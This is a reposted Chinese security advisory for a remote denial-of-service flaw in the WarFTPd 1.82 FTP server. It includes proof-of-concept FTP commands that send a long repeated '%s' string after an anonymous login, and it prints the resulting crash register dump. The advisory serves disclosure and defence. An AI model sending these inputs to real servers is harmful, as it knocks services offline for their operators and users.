天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

WarFTPd多个命令处理远程拒绝服务漏洞

2008-2-18龙翔阁红客基地佚名

  受影响系统

  Jgaa WarFTPd 1.82.00-RC11

  描述

  BUGTRAQ ID: 20944

  War FTP Daemon是32位Windows平台上的FTP服务器。

  WarFTPd在处理多个命令的畸形参数时存在漏洞,远程攻击者可能利用此漏洞对服务器造成拒绝服务。

  如果向各种命令发送了包含有两次“%s”字符的超长字符串的话,就会导致WarFTPd拒绝服务。例如,发送以下命令:

  

$ ftp target
  (Banner)
  ftp> quote user anonymous
  ftp> quote pass bla
  ftp> cwd %s*256

或者:

  

ftp> cdup %s*256

就会导致服务器崩溃:

  

EAX 00000001
  ECX 00000073
  EDX 00000002
  EBX 0079E890
  ESP 0079E7A0
  EBP 00A55A8A
 ASCII
  "s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %s
  characters)" 
 ESI 0079E7DE
  EDI 0000000A
  EIP 00431540
 war-ftpd.00431540
    00431540
   8A08 
            MOV CL,BYTE PTR DS:[EAX]

  目前已知至少以下命令受这个漏洞影响:

  

CWD  CDUP  DELE  NLST  LIST  SIZE

  建议

  厂商补丁:

  Jgaa

  目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

  http://support.jgaa.com/index.php?MenuPage=frontpage

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理,安装维护:


本文来源:龙翔阁红客基地 作者:佚名

声明
本文来源地址:0
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系Email:support@txwb.com.,本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行